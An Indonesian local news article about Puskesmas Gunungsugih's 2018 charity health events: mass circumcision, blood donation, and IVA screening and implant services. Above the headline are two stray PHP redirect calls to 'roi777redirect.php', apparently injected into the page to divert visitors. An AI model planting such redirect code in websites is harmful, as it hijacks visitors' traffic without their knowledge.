header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Puskesmas Gunungsugih Peduli, Berikan Cinta Melalui Baksos -
Puskesmas Gunungsugih Peduli, Berikan Cinta Melalui Baksos

BAKSOS – Kepala Puskesmas Gunungsugih Yulianti Nilawati bersama tim melayani masyarakat saat melakukan baksos.

TRANSLAMPUNG.COM, GUNUNGSUGIH – Puskesmas Gunungsugih, Lampung Tengah (Lamteng) terus menunjukkan kepeduliannya terhadap masyarakat. Terutama masyarakat kurang mampu, yang berada di wilayah kerja puskesmas setempat.

Kepedulian itu, ditunjukkan oleh pihak puskesmas yang pernah mewakili lomba IVA tingkat nasional ini, dengan melakukan bakti sosial (baksos) bekerja sama dengan berbagai instansi. Diantaranya, Pemkab Lamteng dan instansi lainnya. Rangkaian kegiatannya, dilakukan di sejumlah tempat.

Kepala Puskesmas Gununungsugih, Yulianti Nilawati, M. Kes., mengatakan, kegiatan bakti sosial yang dilakukan, diantaranya khitan masal pada hari Minggu (8/7/2018).

Kemudian, bakti sosial donor darah yang dilakukan di Lapas Kelas III Gunungsugih pada Senin (10/6/2018). “Rangkaian bakti sosial ini bekerja sama dengan Pemda Lampung Tengah. Ada juga dengan Lapas Gunungsugih serta Mahkamah Agung,” ujar Yulianti yang merupakan kepala puskesmas penggagas perang terhadap stunting ini.

Selain itu, baksos ini merupakan instruksi Wabup Lampung Tengah, Loekman Djoyosoemarto. “Pelaksanaan instruksi ini, di masing-masing puskesmas. Dan Puskesmas Gunungsugih sudah memulainya,” imbuh ibu tiga anak tersebut.

Selanjutnya, untuk baksos, pada hari Selasa (10/7/2018) berlangsung di Puskesmas Gunungsugih dan Puskeskam Bangunrejo. Yakni dengan melakukan pemeriksaan IVA dan pelayanan implant.

“Untuk baksos pemeriksaan IVA dan pelayanan implant diikuti sekitar 40 peserta. Mereka merupakan warga yang berdomisili di wilayah kerja Puskesmas Gunungsugih,” bebernya.

Suksesnya kegiatan bakti sosial, menurut dia, tak luput dari kerjasama yang baik dan saling mendukung. Terutama Pemkab Lamteng. Lalu melibatkan pula Camat Gunungsugih Zulkarnain Baherza, Kalapas III Gunungsugih Syarpani serta beberapa pihak lainnya.

“Ucapan terima kasih yang sebanyak-banyaknya kami ucapkan kepada semua pihak yang terlibat dalam kegiatan ini. Khususnya Pemerintah Kabupaten Lampung Tengah. Tak lupa juga kami mengucapkan terima kasih kepada seluruh lurah dan kepala kampung di Kecamatan Gunungsugih yang sudah ikut membantu kegiatan ini. Dan juga pihak Dinas Kesehatan Lampung Tengah dan team atas kerja sama yang baik,” ucapnya. (rid)

Teks Foto:

BAKSOS – Kepala Puskesmas Gunungsugih Yulianti Nilawati bersama tim melayani masyarakat saat melakukan baksos.

News Reporter